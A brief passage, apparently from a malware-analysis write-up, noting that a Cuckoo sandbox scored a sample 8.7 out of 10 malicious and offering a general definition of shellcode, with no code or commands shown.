Above is the result from cuckoo website, it’s 8.7 / 10 malicious. This basically is a shellcode (designed to exploit vulnerabilities in software or systems, often with

the intent of compromising security, gaining unauthorized access, or causing harm to the target system).